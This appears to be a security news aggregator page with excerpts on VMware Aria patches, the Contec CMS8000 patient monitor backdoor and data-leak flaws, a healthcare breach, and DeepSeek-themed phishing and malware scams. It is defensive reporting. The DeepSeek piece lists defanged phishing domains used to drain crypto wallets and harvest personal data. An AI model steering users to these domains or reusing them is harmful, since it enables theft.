On the crisp morning of December 13th, 2024, as the clock struck 09:59 CET, anticipation filled the air. Around the world, over 200 hackers from 100 teams were gearing up for Outpost24’s annual Capture the Flag (CTF) event, aptly named “json returns“. Participants performed their final checkups, opened cans of energy drinks, and stretched their […] The post Outpost24’s Capture the Flag event recap: “json returns” appeared first on Outpost24.

by Outpost24

Check out the 25 new pieces of training content added in January, alongside the always fresh content update highlights, new features and events. 

by KnowBe4

by ComputerWeekly

Apple''s trackers have been misused to track some without their consent. Here''s how to check if an AirTag is tracking you, whether you use an iPhone or Android phone. Plus, what to do next if you find one.

by ZDNET Security

Watch this tutorial to learn how to use Lynis, an open source security auditing tool, to audit and enhance Linux security.

by ITPro Today

A study from IBM shows the controversial shift to platformization can pay off for enterprises. 

by Cybersecurity Dive

Broadcom has released security updates to patch five security flaws impacting VMware Aria Operations and Aria Operations for Logs, warning customers that attackers could exploit them to gain elevated access or obtain sensitive information. The list of identified flaws, which impact versions 8.x of the software, is below - CVE-2025-22218 (CVSS score: 8.5) - A malicious actor with View Only Admin

by The Hacker News

A new set of critical vulnerabilities has been identified in Contec Health''s CMS8000 Patient Monitor, posing significant cybersecurity and patient safety risks. These vulnerabilities, which have received a CVSS v4 base score of 9.3, allow for remote exploitation with low attack complexity. The security issues identified include an Out-of-Bounds Write vulnerability, a Hidden Functionality (Backdoor), and Privacy Leakage. These flaws could lead to remote code execution, unauthorized file uploads, and exposure of sensitive patient data. Both the Cybersecurity and Infrastructure Security Agency (CISA) and the Food and Drug Administration (FDA) have issued safety communications addressing these risks, highlighting the potential for large-scale exploitation in healthcare environments. Background Critical Infrastructure Sector: Healthcare and Public Health Global Deployment: The CMS8000 Patient Monitor is used worldwide. Manufacturer: Contec Health, headquartered in China. Researcher: An anonymous security researcher reported these vulnerabilities to CISA. Risk Evaluation Successful exploitation of these vulnerabilities can enable a malicious actor to remotely send specially crafted UDP requests, allowing them to write arbitrary data. This could result in remote code execution, unauthorized access to patient information, and even the ability to manipulate device functionality. Moreover, the device has been found to leak patient and sensor data to an unknown external network, further exacerbating security concerns. A particularly aspect of these vulnerabilities is that simultaneous exploitation of all affected devices within a shared network is possible. This increases the risk of coordinated cyberattacks that could compromise multiple patient monitors in a single healthcare facility. To mitigate these risks, both the FDA and CISA have released guidelines and fact sheets detailing the vulnerabilities and recommended security measures. Technical Details Affected Products The vulnerabilities affect the following firmware versions of the CMS8000 Patient Monitor: smart3250-2.6.27-wlan2.1.7.cramfs CMS7.820.075.08/0.74(0.75) CMS7.820.120.01/0.93(0.95) All firmware versions (CVE-2025-0626, CVE-2025-0683) Vulnerabilities Overview 1. Out-of-Bounds Write (CWE-787) CVE-2024-12248 Allows an attacker to send specially formatted UDP requests that write arbitrary data, potentially leading to remote code execution. CVSS v3.1 Base Score: 9.8 CVSS v4 Base Score: 9.3 2. Hidden Functionality (Backdoor) (CWE-912) CVE-2025-0626 The device sends remote access requests to a hard-coded IP address, bypassing network settings. This could allow unauthorized actors to upload and overwrite files on the monitor. CVSS v3.1 Base Score: 7.5 CVSS v4 Base Score: 7.7 3. Privacy Leakage (CWE-359) CVE-2025-0683 In default configuration, the monitor transmits plain-text patient data to a hard-coded public IP address, leading to potential exposure of confidential information. CVSS v3.1 Base Score: 5.9 CVSS v4 Base Score: 8.2 Mitigation Measures Given the high severity of these vulnerabilities, the FDA and CISA strongly recommend removing affected CMS8000 Patient Monitors from networks until a secure patch is available. Additionally, organizations should implement the following security measures: Restrict Network Exposure: Ensure all medical devices, including patient monitors, are not accessible from the internet. Use Firewalls: Place affected devices behind firewalls and isolate them from business networks. Update Firewall Rules: Block unauthorized access to affected devices and external communication with unknown IP addresses. Subnet Segmentation: Ensure medical devices are located on a separate, low-privilege network segment. Source Equipment from Trusted Manufacturers: Avoid using rebranded or resold versions of the CMS8000 that may still contain vulnerabilities. CISA CSAF Repository & OASIS CSAF 2.0 Standard To enhance security automation and expedite mitigation efforts, CISA has made available security advisories in machine-readable format through its CSAF repository. This repository follows the OASIS CSAF 2.0 standard, allowing organizations to consume advisories in a structured manner and reduce response times. The OASIS CSAF Technical Committee developed CSAF as a standardized approach for sharing security advisories in a machine-readable format, facilitating faster remediation and improving overall cybersecurity resilience. Vendors and cybersecurity professionals are encouraged to leverage this resource to stay updated on security threats and vulnerabilities. Healthcare organizations must act swiftly to mitigate these risks by removing affected devices from their networks, implementing strict access controls, and leveraging cybersecurity best practices. Additionally, manufacturers must prioritize security updates and ensure the safety of critical medical devices. CISA and the FDA will continue to monitor the situation and provide updated security recommendations as necessary. Organizations are encouraged to stay vigilant and proactive in securing their medical infrastructure against emerging cyber threats.

by The Cyber Express

Community Health Center (CHC), a Connecticut-based nonprofit healthcare provider, has confirmed that a hacker accessed the sensitive data of more than a million patients. In a filing with Maine’s attorney general on Thursday, CHC said it detected suspicious activity on its network on January 2 and determined that a “skilled criminal hacker” had accessed its […] © 2024 TechCrunch. All rights reserved. For personal use only.

by TechCrunch

The rapid rise of DeepSeek, a Chinese artificial intelligence company known for its open-source large language models (LLMs), has sparked not only excitement but also a significant increase in cyber threats. As of January 2025, the company launched its first free chatbot app, “DeepSeek – AI Assistant,” which quickly became the most downloaded free app on the iOS App Store in the United States, surpassing even OpenAI’s ChatGPT.  According to Cyble, DeepSeek’s success has made it a trailblazer in the AI space, but it has also drawn the attention of cybercriminals, who are now using its reputation to fuel a variety of fraudulent activities, including phishing attacks, malware campaigns, and investment scams.  DeepSeek’s Meteoric Rise and the Cybersecurity Risks That Follow  Following the DeepSeek’s rapid popularity, a concerning trend has emerged. Cybercriminals have begun to exploit its growing recognition to launch scams and malware campaigns. According to recent investigations by Cyble Research and Intelligence Labs (CRIL), several suspicious websites have surfaced, impersonating DeepSeek in an attempt to deceive unsuspecting users. These sites are often tied to cryptocurrency phishing schemes and fraudulent investment opportunities, capitalizing on the trust DeepSeek has earned in the tech community.  One of the key tactics used by threat actors (TAs) involves mimicking the legitimate DeepSeek platform to launch crypto phishing attacks. These schemes involve fraudulent websites that closely resemble DeepSeek’s official site, tricking users into scanning QR codes that ultimately compromise their crypto wallets. Such scams are becoming increasingly common, with cybercriminals taking advantage of popular platforms like DeepSeek to lure users into unsafe situations.  Cyble has identified multiple fraudulent domains tied to these phishing campaigns, including:  abs-register[.]com  deep-whitelist[.]com  deepseek-ai[.]cloud  deepseek[.]boats  deepseek-shares[.]com  deepseek-aiassistant[.]com  usadeepseek[.]com  These domains were linked to malicious efforts designed to extract users’ personal data, steal cryptocurrency, or promote fraudulent investment schemes.  The Growing Threat of Crypto Phishing  [caption id=""attachment_100696"" align=""alignnone"" width=""602""] Crypto phishing website impersonating DeepSeek (Source: Cyble)[/caption] One of the most common phishing tactics identified is the use of QR codes to trick users into compromising their crypto wallets. By creating websites that resemble DeepSeek’s official platform, cybercriminals encourage users to connect their wallets, often through deceptive ""Connect Wallet"" buttons. When a user selects a wallet option, such as MetaMask or WalletConnect, the website prompts them to scan a QR code. However, this action redirects users to a fraudulent address, which ultimately gives cybercriminals access to the wallet and its contents.  [caption id=""attachment_100697"" align=""alignnone"" width=""602""] Phishing site displaying QR code (Source: Cyble)[/caption] Two specific websites, abs-register[.]com and deep-whitelist[.]com, were flagged as part of this scheme. These phishing sites presented themselves as legitimate portals, luring unsuspecting crypto enthusiasts into connecting their wallets through a misleading interface.  The use of QR codes in phishing schemes is not new, but the rise of platforms like DeepSeek has amplified its effectiveness. By leveraging the credibility of a trending service, cybercriminals are increasingly able to deceive even the most cautious users into falling for these attacks.  Fake Investment Scams Exploit DeepSeek’s Popularity  In addition to phishing attacks, fraudsters have also used DeepSeek’s growing prominence to promote fake investment opportunities. One of the more interesting examples discovered by Cyble was the domain deepseek-shares[.]com, which was registered on January 29, 2025. This fraudulent website posed as an official DeepSeek investment platform, claiming to offer pre-IPO shares of the company.  [caption id=""attachment_100701"" align=""alignnone"" width=""602""] Fake-investment-website (Source: Cyble)[/caption] The problem with this claim is that DeepSeek is a privately held company, and no official initial public offering (IPO) announcements have been made. The website''s real purpose is to gather sensitive personal information from potential investors, which can later be exploited for phishing, identity theft, or financial fraud.  These types of investment scams are particularly dangerous because they prey on individuals eager to capitalize on the perceived success of a rapidly growing company. Fraudsters promise lucrative returns, but the goal is not to help investors profit—it’s to steal their personal data and funds.  Malware Campaigns Linked to DeepSeek  Beyond phishing and investment scams, there are also reports of malware campaigns taking advantage of DeepSeek’s rising influence. According to Cyble’s research, several malicious websites have been found claiming to offer legitimate DeepSeek app downloads for various platforms, including Windows, iOS, and Android. While some of these sites appear to be under development, others may serve as entry points for malware.  There have been reports of malware labeled AMOS Stealer, a type of credential-stealing software, being distributed through fraudulent DeepSeek-related downloads. This software can steal sensitive user data, including login credentials, and may even grant attackers full access to users’ online accounts.  To avoid falling victim to such attacks, users are advised to only download the DeepSeek app from official sources. Any websites offering third-party downloads should be approached with caution, as they may be attempting to deliver malicious software. Conclusion   As DeepSeek’s popularity continues to soar, so does the risk of cyber threats targeting its users, including phishing scams, fake investment schemes, and malware campaigns. To protect themselves, users must remain vigilant by verifying official sources, avoiding untrusted third-party websites and QR codes, and scrutinizing crypto projects before making any investments. They should also be cautious about unverified investment opportunities, as DeepSeek has not announced any official IPO or cryptocurrency launch.  Employing reputable security software, keeping systems up to date, and staying informed about phishing and malware tactics are also crucial steps. By following these best practices, individuals can protect their personal information and avoid falling victim to cybercriminals seeking to exploit DeepSeek’s success. 

by The Cyber Express